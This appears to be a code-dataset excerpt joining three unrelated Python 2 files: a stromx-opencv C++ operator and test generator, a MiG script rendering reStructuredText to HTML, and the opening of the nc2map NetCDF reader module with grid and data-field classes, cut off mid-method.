self.doc.line('#include <stromx/cvsupport/Image.h>')
self.doc.line('#include <stromx/cvsupport/Matrix.h>')
self.doc.line('#include <stromx/cvsupport/Utilities.h>')
self.doc.line('#include <stromx/runtime/DataContainer.h>')
self.doc.line('#include <stromx/runtime/DataProvider.h>')
self.doc.line('#include <stromx/runtime/Id2DataComposite.h>')
self.doc.line('#include <stromx/runtime/Id2DataPair.h>')
self.doc.line('#include <stromx/runtime/ReadAccess.h>')
self.doc.line('#include <stromx/runtime/VariantComposite.h>')
self.doc.line('#include <stromx/runtime/WriteAccess.h>')
self.doc.line('#include <opencv2/{0}/{0}.hpp>'.format(cvModule))
self.doc.blank()
def __statics(self):
method = self.m.ident.className()
package = self.p.ident.upper()
self.doc.line(("const std::string {0}::PACKAGE(STROMX_{1}_PACKAGE_"
"NAME);").format(method, package))
self.doc.line(("const runtime::Version {0}::VERSION("
"STROMX_{1}_VERSION_MAJOR, STROMX_{1}_VERSION_MINOR, "
"STROMX_{1}_VERSION_PATCH);".format(method, package)))
self.doc.line('const std::string {0}::TYPE("{0}");'.format(method))
self.doc.blank()
def __constructor(self):
self.doc.line("{0}::{0}()".format(self.m.ident.className()))
self.doc.line(" : runtime::OperatorKernel(TYPE, PACKAGE, VERSION, "
"setupInitParameters()),")
self.doc.increaseIndent()
v = OpImplGenerator.ParameterInitVisitor()
self.visitParameters(v)
v.export(self.doc)
self.doc.decreaseIndent()
self.doc.scopeEnter()
self.doc.scopeExit()
self.doc.blank()
def __getParameter(self):
self.doc.line("const runtime::DataRef {0}::getParameter"
"(unsigned int id) const"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("switch(id)")
self.doc.scopeEnter()
v = OpImplGenerator.GetParametersVisitor(self.doc)
self.visitParameters(v)
self.doc.label("default")
self.doc.line("throw runtime::WrongParameterId(id, *this);")
self.doc.scopeExit()
self.doc.scopeExit()
self.doc.blank()
def __setParameter(self):
self.doc.line("void {0}::setParameter"
"(unsigned int id, const runtime::Data& value)"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("try")
self.doc.scopeEnter()
self.doc.line("switch(id)")
self.doc.scopeEnter()
v = OpImplGenerator.SetParametersVisitor(self.doc)
self.visitParameters(v)
self.doc.label("default")
self.doc.line("throw runtime::WrongParameterId(id, *this);")
self.doc.scopeExit()
self.doc.scopeExit()
self.doc.line("catch(runtime::BadCast&)")
self.doc.scopeEnter()
self.doc.line("throw runtime::WrongParameterType(parameter(id), *this);")
self.doc.scopeExit()
self.doc.scopeExit()
self.doc.blank()
def __setupInitParameters(self):
self.doc.line("const std::vector<const runtime::Parameter*> "
"{0}::setupInitParameters()"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("std::vector<const runtime::Parameter*> parameters;")
self.doc.blank()
if len(self.m.options) > 1:
v = OpImplGenerator.SetupParametersVisitor(self.doc, isInit = True)
self.optionParam.accept(v)
self.doc.line("return parameters;")
self.doc.scopeExit()
self.doc.blank()
def __setupParameters(self):
self.doc.line("const std::vector<const runtime::Parameter*> "
"{0}::setupParameters()"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("std::vector<const runtime::Parameter*> parameters;")
self.doc.blank()
self.doc.line("switch(int({0}))".format(
self.optionParam.ident.attribute()))
self.doc.scopeEnter()
for o in self.m.options:
self.doc.label("case({0})".format(o.ident.constant()))
self.doc.scopeEnter()
v = OpImplGenerator.SetupParametersVisitor(self.doc)
for arg in o.args:
arg.accept(v)
self.doc.scopeExit()
self.doc.line("break;")
self.doc.scopeExit()
self.doc.blank()
self.doc.line("return parameters;")
self.doc.scopeExit()
self.doc.blank()
def __setupInputs(self):
self.doc.line("const std::vector<const runtime::Input*> "
"{0}::setupInputs()"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("std::vector<const runtime::Input*> inputs;")
self.doc.blank()
self.doc.line("switch(int({0}))".format(
self.optionParam.ident.attribute()))
self.doc.scopeEnter()
for o in self.m.options:
self.doc.label("case({0})".format(o.ident.constant()))
self.doc.scopeEnter()
v = OpImplGenerator.SetupInputsVisitor(self.doc)
for arg in o.args:
arg.accept(v)
self.doc.scopeExit()
self.doc.line("break;")
self.doc.scopeExit()
self.doc.blank()
self.doc.line("return inputs;")
self.doc.scopeExit()
self.doc.blank()
def __setupOutputs(self):
self.doc.line("const std::vector<const runtime::Output*> "
"{0}::setupOutputs()"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("std::vector<const runtime::Output*> outputs;")
self.doc.blank()
self.doc.line("switch(int({0}))".format(
self.optionParam.ident.attribute()))
self.doc.scopeEnter()
for o in self.m.options:
self.doc.label("case({0})".format(o.ident.constant()))
self.doc.scopeEnter()
v = OpImplGenerator.SetupOutputsVisitor(self.doc)
self.visitOption(o, v)
self.doc.scopeExit()
self.doc.line("break;")
self.doc.scopeExit()
self.doc.blank()
self.doc.line("return outputs;")
self.doc.scopeExit()
self.doc.blank()
def __initialize(self):
self.doc.line("void {0}::initialize()"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("runtime::OperatorKernel::initialize(setupInputs(), "
"setupOutputs(), setupParameters());")
self.doc.scopeExit()
self.doc.blank()
def __execute(self):
self.doc.line("void {0}::execute(runtime::DataProvider & provider)"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("switch(int({0}))".format(
self.optionParam.ident.attribute()))
self.doc.scopeEnter()
for o in self.m.options:
self.doc.label("case({0})".format(o.ident.constant()))
self.doc.scopeEnter()
v = OpImplGenerator.InputMapperVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.ReceiveInputDataVisitor()
self.visitOption(o, v)
v.export(self.doc)
self.doc.blank()
v = OpImplGenerator.InDataVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.AccessVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.CopyWriteAccessVisitor()
self.visitOption(o, v)
v.export(self.doc)
v = OpImplGenerator.CheckVariantVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.CastedDataVisitor(self.doc)
self.visitOption(o, v)
v = OpImplGenerator.CheckCastedDataVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
if o.inputCheck != None:
self.doc.document(o.inputCheck)
self.doc.blank()
v = OpImplGenerator.InitInVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.CvDataVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.MethodReturnValueVisitor()
self.visitOption(o, v)
retVal = v.export()
v = OpImplGenerator.MethodArgumentVisitor()
self.visitOption(o, v)
argStr = v.export()
namespace = ""
if self.m.namespace != "":
namespace = "{0}::".format(self.m.namespace)
self.doc.line("{3}{2}{0}({1});".format(self.m.ident, argStr,
namespace, retVal))
if o.postCall != None:
self.doc.document(o.postCall)
self.doc.blank()
v = OpImplGenerator.OutDataVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.InitOutVisitor(self.doc)
self.visitOption(o, v)
v = OpImplGenerator.SendOutputDataVisitor()
self.visitOption(o, v)
v.export(self.doc)
self.doc.scopeExit()
self.doc.line("break;")
self.doc.scopeExit()
self.doc.scopeExit()
self.doc.blank()
def __convertEnumValues(self):
v = OpImplGenerator.EnumConversionDefVisitor(self.doc, self.m)
self.visitParameters(v, False)
class OpTestGenerator(object):
"""
Abstract base class of all generators which output operator tests.
"""
def testNames(self):
l = []
for o in self.m.options:
for i in range(len(o.tests)):
l.append("test{0}{1}".format(o.ident.className(), i))
return l
class OpTestHeaderGenerator(MethodGenerator, OpTestGenerator):
"""
Generates the header of an operator test.
"""
def generate(self):
self.__includeGuardEnter()
self.__includes()
self.namespaceEnter()
self.__classEnter()
self.__testSuite()
self.doc.blank()
self.doc.label("public")
self.__constructor()
self.doc.line("void setUp();")
self.doc.line("void tearDown();")
self.doc.blank()
self.doc.label("protected")
self.__testMethods()
self.doc.blank()
self.doc.label("private")
self.doc.line("runtime::OperatorTester* m_operator;")
self.__classExit()
self.namespaceExit()
self.__includeGuardExit()
filename = "stromx/{0}/test/{1}Test.h".format(self.p.ident,
self.m.ident.className())
with file(filename, "w") as f:
f.write(self.doc.string())
def __includeGuardEnter(self):
self.doc.line("#ifndef {0}".format(self.__includeGuard()))
self.doc.line("#define {0}".format(self.__includeGuard()))
self.doc.blank()
def __includes(self):
self.doc.line('#include "stromx/{0}/Config.h"'.format(self.p.ident))
self.doc.blank()
self.doc.line('#include <cppunit/extensions/HelperMacros.h>')
self.doc.line('#include <cppunit/TestFixture.h>')
self.doc.blank()
self.doc.line('#include "stromx/runtime/OperatorTester.h"')
self.doc.blank()
def __includeGuardExit(self):
self.doc.line("#endif // {0}".format(self.__includeGuard()))
def __includeGuard(self):
return "STROMX_{0}_{1}TEST_H".format(self.p.ident.upper(),
self.m.ident.upper())
def __classEnter(self):
self.doc.line((
"class {0}Test : public CPPUNIT_NS::TestFixture"
).format(self.m.ident.className()))
self.doc.line("{")
self.doc.increaseIndent()
def __testSuite(self):
self.doc.line((
"CPPUNIT_TEST_SUITE({0}Test);"
).format(self.m.ident.className()))
for test in self.testNames():
self.doc.line("CPPUNIT_TEST({0});".format(test))
self.doc.line("CPPUNIT_TEST_SUITE_END();")
def __constructor(self):
self.doc.line((
"{0}Test() : m_operator(0) {{}}"
).format(self.m.ident.className()))
def __testMethods(self):
for test in self.testNames():
self.doc.line("void {0}();".format(test))
def __classExit(self):
self.doc.decreaseIndent()
self.doc.line("};")
class OpTestImplGenerator(MethodGenerator, OpTestGenerator):
"""
Generates the implementation of an operator test.
"""
def __includes(self):
self.doc.line((
'#include "stromx/{0}/test/{1}Test.h"'
).format(self.p.ident, self.m.ident.className()))
self.doc.blank()
self.doc.line('#include <stromx/runtime/OperatorException.h>')
self.doc.line('#include <stromx/runtime/ReadAccess.h>')
self.doc.line('#include "stromx/cvsupport/Image.h"')
self.doc.line((
'#include "stromx/{0}/{1}.h"'
).format(self.p.ident, self.m.ident.className()))
self.doc.blank()
def __testSuite(self):
self.doc.line((
"CPPUNIT_TEST_SUITE_REGISTRATION (stromx::{0}::{1}Test);"
).format(self.p.ident, self.m.ident.className()))
self.doc.blank()
def __setUp(self):
className = self.m.ident.className()
self.doc.line("void {0}Test::setUp()".format(className))
self.doc.scopeEnter()
self.doc.line((
"m_operator = new stromx::runtime::OperatorTester(new {0});"
).format(self.m.ident.className()))
self.doc.scopeExit()
self.doc.blank()
def __tearDown(self):
className = self.m.ident.className()
self.doc.line("void {0}Test::tearDown()".format(className))
self.doc.scopeEnter()
self.doc.line("delete m_operator;")
self.doc.scopeExit()
self.doc.blank()
def __testMethods(self):
className = self.m.ident.className()
for o in self.m.options:
for i, test in enumerate(o.tests):
testName = "test{0}{1}".format(o.ident.className(), i)
self.doc.line(
"void {0}Test::{1}()".format(className, testName)
)
self.doc.scopeEnter()
if len(self.m.options) > 1:
index = "{0}::PARAMETER_DATA_FLOW".format(self.m.ident.className())
value = (
"runtime::Enum({0}::{1})"
).format(self.m.ident.className(), o.ident.constant())
l = "m_operator->setParameter({0}, {1});".format(index, value)
self.doc.line(l)
self.doc.line("m_operator->initialize();")
self.doc.line("m_operator->activate();")
self.doc.blank();
testgenerator.generate(self.doc, self.m, o.args,
test, testName)
self.doc.scopeExit()
self.doc.blank()
def generate(self):
self.__includes()
self.__testSuite()
self.namespaceEnter()
self.__setUp()
self.__tearDown()
self.__testMethods()
self.namespaceExit()
filename = "stromx/{0}/test/{1}Test.cpp".format(self.p.ident,
self.m.ident.className())
with file(filename, "w") as f:
f.write(self.doc.string())
def generateMethodFiles(package, method):
"""
Generates the operator and the operator tests for the given method.
"""
g = OpHeaderGenerator()
g.save(package, method)
g = OpImplGenerator()
g.save(package, method)
g = OpTestHeaderGenerator()
g.save(package, method)
g = OpTestImplGenerator()
g.save(package, method)
if __name__ == "__main__":
import doctest
doctest.testmod()
|
uboot/stromx-opencv
|
opencv/methodgenerator.py
|
Python
|
apache-2.0
| 62,812
|
[
"VisIt"
] |
50161b6438dfe7282357aaf833b623146d3651871ae0083b74be15c1df46eeeb
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# --- BEGIN_HEADER ---
#
# html_writer - [insert a few words of module description on this line]
# Copyright (C) 2003-2009 The MiG Project lead by Brian Vinter
#
# This file is part of MiG.
#
# MiG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MiG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# -- END_HEADER ---
#
from docutils.writers.html4css1 import Writer, HTMLTranslator
from docutils.core import publish_string
# Setup a translator writer
html_writer = Writer()
html_writer.translator_class = HTMLTranslator
# Setup a restructured text example
reST = \
"""
Example of reST:
================
This is a small example of the way reST can be used as a base for generating HTMLformatted text that:
- looks nice
- is standards compliant
- is flexible
We *may* decide to start using this as text formatting tool in MiG__ later on.
__ http://mig-1.imada.sdu.dk/
We can also use it for creating tables if we want to:
===== ===== ======
Input Output
----- ----- ------
A B A or B
===== ===== ======
False False False
True False True
False True True
True True True
===== ===== ======
Have fun!
----
Cheers, Jonas
"""
# Translate reST to html
html = publish_string(reST, settings_overrides={'output_encoding'
: 'unicode'}, writer=html_writer)
print html
|
heromod/migrid
|
mig/reST/html_writer.py
|
Python
|
gpl-2.0
| 1,966
|
[
"Brian"
] |
965e3ce4dfc91bc837b1e2ed01fcface72579c98654231af7420171e395df2de
|
# -*- coding: utf-8 -*-
"""readers module of the nc2map python module
This script contains the basic data danagement utilities in the nc2map
module.
It contains the following reader classes
- The ReaderBase class defines the main methods for all readers,
such as data extraction, the merging method and the arithmetics.
- The NCReader class is a wrapper around a netCDF4.Dataset instance
and implemented as a subclass of ReaderBase
- The MFNCReader class is a wrapper around a netCDF4.MFDataset instance
and implemented as a subclass of ReaderBase
- The ArrayReader is a class mimiking the structure of the netCDF4.Dataset
but without the storing of data in a file.
Furthermore it contains the DataField class, a wrapper around a
numpy.ma.MaskedArray with enhanced capabilities. And it contains the
Variable class which is the comparable version of the netCDF4.Variable class
but for ArrayReader instances."""
import os
import glob
import logging
from itertools import (izip, izip_longest, product, imap, chain, cycle, repeat,
tee)
from collections import OrderedDict
import datetime as dt
import numpy as np
import netCDF4 as nc
from .warning import warn, critical, Nc2MapRuntimeWarning
import mpl_toolkits.basemap as bm
from matplotlib.tri import Triangulation, TriAnalyzer
from nc_utils import chunk_shape_3D
from .defaults import readers as defaults
try:
from xray import Dataset as xrayDataset, open_dataset, open_mfdataset
except ImportError as xray_io_error:
def open_dataset(*args, **kwargs):
raise ImportError(xray_io_error.message)
open_mfdataset = open_dataset
xrayDataset = None
defaultnames = defaults['dimnames']
readers = ['NCReader', 'MFNCReader', 'XrayReader', 'MFXrayReader',
'ArrayReader']
def auto_set_reader(*args, **kwargs):
"""Function to choose a reader automatically via try and error.
Arguments and keyword arguments are passed directly to the reader class.
Keyword arguments (beside the one for the reader initialization) are
- readers: list of strings with reader names (if not the default readers
shall be used). Otherwise the following default readers will be used:
"""
# docstring is extended below
logger = logging.getLogger("%s.auto_set_reader" % __name__)
# check if input is a reader
if len(args) == 1:
logger.debug("Found one input argument --> Check if reader")
data_reader = args[0]
if (hasattr(data_reader, 'get_data')
and hasattr(data_reader, 'lola_variables')):
logger.debug(
"Found get_data method and lola_variables --> Assume reader!")
return data_reader
else:
logger.debug(
"Did not find get_data method and lola_variables in "
"input... Try now the different readers...")
else:
logger.debug("Found multiple arguments --> try different readers")
try:
test_readers = kwargs.pop('readers')
except KeyError:
test_readers = readers
logger.debug("Set reader automatically. Order of trial is %s",
', '.join(test_readers))
success = False
for reader in test_readers:
try:
logger.debug("Try %s...", reader)
data_reader = globals()[reader](*args, **kwargs)
logger.debug("Suceeded.")
success = True
break
except Exception as e:
logger.debug("Failed.", exc_info=True)
if not success:
raise IOError(
"Could not open any reader with one of %s. Try manually!" %
', '.join(test_readers))
return data_reader
class Icon_Triangles(object):
def get_triangles(self, reader, varo=None, convert_spatial=True):
"""Get the longitude informations and triangles of an ICON-like grid
This function extracts the triangles in an unstructered ICON-like[1]_
grid. This grid consists of centered longitude informations, stored in
variable *clon*, centered latitude informations, stored in variable
*clat*, and the vortex coordinates, stored in variable *clon_vertices*
and *clat_vertices*.
Parameters
----------
reader: :class:`~nc2map.ReaderBase` instance
reader containing the grid informations
varo: object
variable object containing the data (only used for compatibility)
convert_spatial: bool, optional
Default: True. If this is True, and the spatial dimensions
(latitudes, longitudes) are in radians, they are converted to
degrees
Returns
-------
lon: 1D-array of longitudes
lat: 1D-array of latitudes
triang: matplotlib.tri.Triangulation instance with the triangle
definitions
Raises
------
nc2map.readers.GridError
if `reader` does not have the above mentioned variables
.. [1] Max-Planck-Institute for Meteorology, "ICON (Icosahedral
non-hydrostatic) general circulation model",
:ref:`http://www.mpimet.mpg.de/en/science/models/icon.html`,
accessed June 23, 2015"""
self.test(reader)
clon = reader.variables['clon']
clat = reader.variables['clat']
clonv = reader.variables['clon_vertices']
clatv = reader.variables['clat_vertices']
triangles = np.reshape(range(len(clon)*3), (len(clon), 3))
if convert_spatial:
try:
units = clon.units
except AttributeError:
units = None
clon = reader.convert_spatial(clon, units, raise_error=False,
vname='clon')
clonv = reader.convert_spatial(clonv, units, raise_error=False,
vname='clon_vertives').ravel()
try:
units = clat.units
except AttributeError:
units = None
clat = reader.convert_spatial(clat, units, raise_error=False,
vname='clat')
clatv = reader.convert_spatial(clatv, units, raise_error=False,
vname='clat_vertices').ravel()
else:
clon = clon[:]
clat = clat[:]
clonv = clonv[:].ravel()
clatv = clatv[:].ravel()
return clon, clat, Triangulation(clonv, clatv, triangles=triangles)
def test(self, reader, varo=None):
"""Test the reader if it matches the conventions"""
miss = {'clon', 'clat', 'clon_vertices', 'clat_vertices'} - set(
reader.variables)
if miss:
raise GridError(
"Missing grid variables: %s" % ', '.join(miss))
def get_coords(self, reader, varo=None):
self.test(reader)
return {
'clon': reader.variables['clon'],
'clat': reader.variables['clat'],
'clon_vertices': reader.variables['clon_vertices'],
'clat_vertices': reader.variables['clat_vertices']}
class Ugrid_Triangles(object):
def get_triangles(self, reader, varo, convert_spatial=True):
"""Get the longitude informations and triangles of an unstructured grid
This function extracts the triangles in an unstructered grid that
follows the Ugrid conventions.
Parameters
----------
reader: :class:`~nc2map.ReaderBase` instance
reader containing the grid informations
varo: object
variable object containing the data (only used for compatibility)
convert_spatial: bool, optional
Default: True. If this is True, and the spatial dimensions
(latitudes, longitudes) are in radians, they are converted to
degrees
Returns
-------
lon: 1D-array of longitudes
lat: 1D-array of latitudes
triang: matplotlib.tri.Triangulation instance with the triangle
definitions
Raises
------
nc2map.readers.GridError
if `reader` does not follow the Ugrid conventions"""
(lonname, lon), (latname, lat), (triname, triangles) = self.test(
reader, varo)
if convert_spatial:
lon = reader.convert_spatial(lon, vname=reader.lonnames)
lat = reader.convert_spatial(lat, vname=reader.lonnames)
return lon[:], lat[:], Triangulation(lon[:], lat[:],
triangles=triangles[:])
def test(self, reader, varo):
"""Tests the reader and returns grid informations"""
try:
mesh = varo.mesh
except AttributeError:
raise GridError("Variable does not have a mesh defined!")
try:
mesh = reader.variables[mesh]
except KeyError:
raise GridError("Mesh %s was not found in the reader!" % mesh)
try:
nodes = mesh.node_coordinates.split()[:2]
if not len(nodes) == 2:
raise GridError(
"Need two node_coordinates variables, but found only "
"one ({0})".format(nodes[0]))
except AttributeError:
raise GridError(
"Topology variable does not have a valid (space-separated) "
"node_coordinates attribute")
try:
lon = reader.variables[nodes[0]]
except KeyError:
raise GridError("Did not found variable %s in reader!" % nodes[0])
try:
lat = reader.variables[nodes[1]]
except KeyError:
raise GridError("Did not found variable %s in reader!" % nodes[1])
try:
triangles = mesh.face_node_connectivity
except AttributeError:
raise GridError(
"Topology variable does not have a face_node_connectivity "
"attribute!")
try:
triangles = reader.variables[triangles]
except KeyError:
raise GridError(
"face_node_connectivity variable {0} was not found in the "
"reader!".format(triangles))
return [(nodes[0], lon), (nodes[1], lat),
(mesh.face_node_connectivity, triangles)]
def get_coords(self, reader, varo):
coords = dict(self.test(reader, varo))
mesh = varo.mesh
coords[mesh] = reader.variables[mesh]
return coords
ufuncs = [Ugrid_Triangles(), Icon_Triangles()]
def dimprop(x, doc):
"""Function which creates a dimension property
Sets up the dimension by using self.nco and the given dimension name"""
# ---- not used at the moment ----
def getx(self):
if getattr(self, x+'names') is None:
return None
return self.variables[getattr(self, x+'names')]
return property(getx, doc=doc)
def dimlist(x):
"""Function which creates a property get the string out of the set
value, which is also in the variables attribute"""
def getx(self):
names = [name for name in getattr(self, '_'+x)
if name in self.variables]
if len(names) == 0:
names = [None]
elif len(names) > 1:
raise ValueError(
"Found multiple %s in the Reader: %s" % (
x, ', '.join(names)))
return names[0]
def setx(self, dims):
if isinstance(dims, (str, unicode)):
setattr(self, '_'+x, {dims})
else:
setattr(self, '_'+x, set(dims))
def delx(self):
delattr(self, '_'+x)
doc = """
Name of the %s dimension. Set it with a string or list of strings, get
the dimension name in the reader as string""" % (
x.replace('names', ''))
return property(getx, setx, delx, doc)
def datadim(x):
"""Function returning a property that gets and sets values of x from and
into the dims dictionary"""
def getx(self):
try:
return self.dims[getattr(self, '_DataField'+x)]
except ValueError:
return None
def setx(self, value):
self.dims[getattr(self, '_DataField'+x)] = value
def delx(self):
del self.dims[getattr(self, '_DataField'+x)]
doc = """Data of the %s dimension. See also dims property"""
return property(getx, setx, delx, doc)
def _get_dims(obj):
try:
return obj.dimensions
except AttributeError:
return obj.dims
class GridError(Exception):
pass
class Variable(object):
"""Variable object for an ArrayReader instance. The structure is
essentially similar as for the netCDF4.Variable class.
If var is your Variable instance, the data can be accessed in two ways:
1) via the data attribute var.data (returns the pure numpy array)
2) via __getitem__ var[...]
In case 1), the data is accessed in the usual numpy indexing style (see
http://docs.scipy.org/doc/numpy/reference/arrays.indexing.html) whereas
the second case follows the slicing rules of the netCDF4.Variable class,
allowing one-dimensional boolean and integer sequences. One example (where
lons might be a one-dimensional longitude array) might be
>>> var[::2, [1,3,6], 4, lons>0]
which is not possible for a usual numpy array. The same holds for setting
the data.
Note that using 2) will always create a copy of the data.
Meta informations can be accessed via the explicit attribute (e.g.
var.long_name) or via var.meta['long_name']. New meta informations can
be in the same way: var.long_name = 'my long name' or
var.meta['long_name'] = 'my long name'
"""
__slots__ = ['data', 'var', 'dimensions', 'meta', 'name']
@property
def shape(self):
"""Return the shape of data"""
return self.data.shape
@property
def dtype(self):
"""dtype of the variable"""
return self.data.dtype
def __init__(self, data=None, var='var', dims=('time', 'lat', 'lon'),
meta={}):
"""Initialization method for Variable instance
Input:
- data: numpy array
- var: name of the variable
- dims: tuple of dimension names (length of dims must match to
length of data.shape)
- meta: meta data
"""
if data is not None and len(np.shape(data)) != len(tuple(dims)):
try:
raise ValueError((
"Shape of data (%s) and dimensions (%s) do not match!"
% (np.shape(data), dims)))
except:
raise ValueError((
"Shape of data (length %i) and dimensions (length %i) "
"do not match!") % (len(np.shape(data)),
len(tuple(dims))))
if not isinstance(data, np.ndarray):
data = np.asarray(data)
self.data = data
self.var = var
self.name = var
self.dimensions = tuple(dims)
self.meta = OrderedDict(meta).copy()
def __getitem__(self, keys):
"""Set item method of Variable instance. Keys may be integers, slices
or one dimensional integer or boolean arrays.
For example
>>> tempdat = nco.variables['t2m'][::2, [1,3,6], lats>0, lons>0]"""
try:
keys = list(keys)
except TypeError: # non-iterable, i.e. only one slice or integer
return self.data[keys].copy() # make sure that a copy is returned
squeeze = []
for i, key in enumerate(keys):
if isinstance(key, slice):
keys[i] = range(*key.indices(self.shape[i]))
elif isinstance(key, int):
keys[i] = [key]
if self.data.ndim > 1:
squeeze.append(i)
elif np.ndim(key) > 1:
raise IndexError("Index cannot be multidimensional")
if not squeeze:
return self.data[np.ix_(*keys)]
else:
return np.squeeze(self.data[np.ix_(*keys)], squeeze)
def __setitem__(self, keys, value):
"""Set item method of Variable instance. Keys may be integers, slices
or one dimensional integer or boolean arrays.
For example
>>> tempdat = nco.variables['t2m'][::2, [1,3,6], lats>0, lons>0]"""
try:
keys = list(keys)
except TypeError: # non-iterable, i.e. only one slice or integer
self.data[keys] = value
return
squeeze = []
for i, key in enumerate(keys):
if isinstance(key, slice):
keys[i] = range(*key.indices(self.shape[i]))
elif isinstance(key, int):
keys[i] = [key]
squeeze.append(i)
elif np.ndim(key) > 1:
raise IndexError("Index cannot be multidimensional")
if not squeeze:
self.data[np.ix_(*keys)] = value
else:
try:
s = self.data[np.ix_(*keys)].shape
self.data[np.ix_(*keys)] = np.reshape(value, s)
except ValueError:
self.data[np.ix_(*keys)] = value
def __len__(self):
return len(self.data)
def __getattr__(self, attr):
try:
return self.meta[attr]
except KeyError:
raise AttributeError(
"'%s' object has no attribute '%s'" % (
self.__class__.__name__, attr))
def __setattr__(self, attr, value):
if attr not in self.__class__.__slots__:
getattr(self, 'meta')[attr] = value
else:
super(Variable, self).__setattr__(attr, value)
def __dir__(self):
return dir(super(Variable, self)) + self.meta.keys()
def __str__(self):
return repr(self)
def __repr__(self):
strings = [
super(Variable, self).__repr__(),
"%s %s(%s)" % (self.data.dtype, self.var,
', '.join(self.dimensions))]
for item in self.meta.items():
strings.append(" %s: %s" % item)
strings.append("current shape: %s" % str(self.shape))
return '\n'.join(strings)
def _infer_interval_breaks(coord):
"""
>>> _infer_interval_breaks(np.arange(5))
array([-0.5, 0.5, 1.5, 2.5, 3.5, 4.5])
"""
deltas = 0.5 * (coord[1:] - coord[:-1])
first = coord[0] - deltas[0]
last = coord[-1] + deltas[-1]
return np.r_[[first], coord[:-1] + deltas, [last]]
class DataField(object):
"""Multidimensional Data Field with latitude, longitude, time and level
dimension.
This class is a wrapper around a numpy.ma.MaskedArray instance with
additional grid informations.
Data can be accessed via
>>> mydatafield = DataField(...)
>>> data = mydatafield[:]
Additional attributes:
- dims: numpy.ndarray containing grid informations (e.g. longitude data,
etc.). The information can be accessed via the name of the dimension
(e.g. data.dims['lon']) or data.dims[['lon', 'lat']]
- dimensions: tuple of strings where each string stands for the dimension
the specific axis belongs to
Additional properties:
- grid: returns 2-dimensional longitude- and latitude arrays
- gridweights: Calculate grid weights from longitude and latitude
informations in self.dims
- lon: longitude dimension data
- lat: latitude dimension data
- time: time dimension data
- level: level dimension data
Additional methods:
- mask_outside: masks the data outside of the region of a
mpl_toolkits.basemap.Basemap instance
- shift_data: shifts the data to match the longitude- latitude
defintions of a mpl_toolkits.basemap.Basemap instance
- mask_data: masks the data to match a given two-dimensional array with
the same shape as the longitude and latitude dimension
- fldmean: Computes the weighted mean over the longitude-latitude
dimensions (or more)
- fldstd: Computes the weighted standard deviation over the
longitude-latitude dimensions (or more)
- percentiles: Computes the weighted percentile over the
longitude-latitude dimensions (or more)
Additional methods:
- fldmean
"""
__slots__ = ['__data', '__lon', '__lat', '__time', 'dims', '__spatial',
'dimensions', '__level', '__var', 'logger', 'triangles']
time = datadim('__time')
level = datadim('__level')
lon = datadim('__lon')
lat = datadim('__lat')
def __init__(self, data, var, dimensions, dims={}, lon='lon', lat='lat',
level='level', time='time', spatial_ax=None, triangles=None):
"""Initialization method of DataField2D instance
Input:
- data: two-dimensional data array
- lon: longitude data
- lat: latitude data
- time: array with time information as datetime instances
- level: array with level informations
- dimensions: dimension names (e.g. ('lat', 'lon')) in the order as
they appear in the shape of data.
- spatial_ax: axes numbers with spatial information (used for
fldmean, etc.)
- triangles: matplotlib.tri.Triangulation instance for
unstructered grids"""
self.set_logger()
self.__var = var
self.logger.debug("Input arguments:")
for arg in ['data', 'dimensions']:
self.logger.debug(" %s: %s", arg, type(locals()[arg]))
self.logger.debug("Input dimensions:")
for key, val in dims.iteritems():
self.logger.debug(" %s: %s", key, type(val))
self.__data = data
self.dimensions = list(dimensions)
self.dims = self._dict_to_recarray(dims)
self.check_dims()
self.__lon = str(lon)
self.__lat = str(lat)
self.__level = str(level)
self.__time = str(time)
self.__spatial = spatial_ax
self.triangles = triangles
@property
def grid(self):
"""Tuple (lat2d, lon2d), where lat2d is the 2 dimensional latitude and
lon2d the 2 dimensional longitude corresponding to the data
Input:
- ilat: integer. Latitude axis in data.shape
- ilon: integer. Longitude axis in data.shape
Returns:
lat2d, lon2d
"""
if len(np.shape(self.lat)) > 1 or len(self.__spatial) == 1:
return self.lat, self.lon
else:
ilat = self.dimensions.index(self.__lat)
ilon = self.dimensions.index(self.__lon)
if ilat > ilon:
return np.meshgrid(*map(_infer_interval_breaks,
[self.lon, self.lat]))
else:
return list(
np.roll(np.meshgrid(self.lon, self.lat), 1, axis=0))
@property
def gridweights(self):
"""Calculates weights from latitude and longitude informations.
Please note that latitude and longitude are expected to be in
degrees.
Input:
- ilat: integer. Latitude axis in data.shape
- ilon: integer. Longitude axis in data.shape
Returns:
weights: 2 Dimensional array matching to lat2d and lon2d"""
if len(self.__spatial) == 1: # return equal weights
tile_shape = list(self.shape)
dims = list(self.dimensions)
ispatial = self.__spatial[0]
tile_shape[ispatial] = 1
weights = np.ma.ones(self.shape)
weights.mask = self.mask
weights /= weights.sum(ispatial)
return weights
lat2d, lon2d = self.grid # may also be 1d if len(self.__spatial) == 1
ilat = self.dimensions.index(self.__lat)
ilon = self.dimensions.index(self.__lon)
ilat_orig = ilat
ilon_orig = ilon
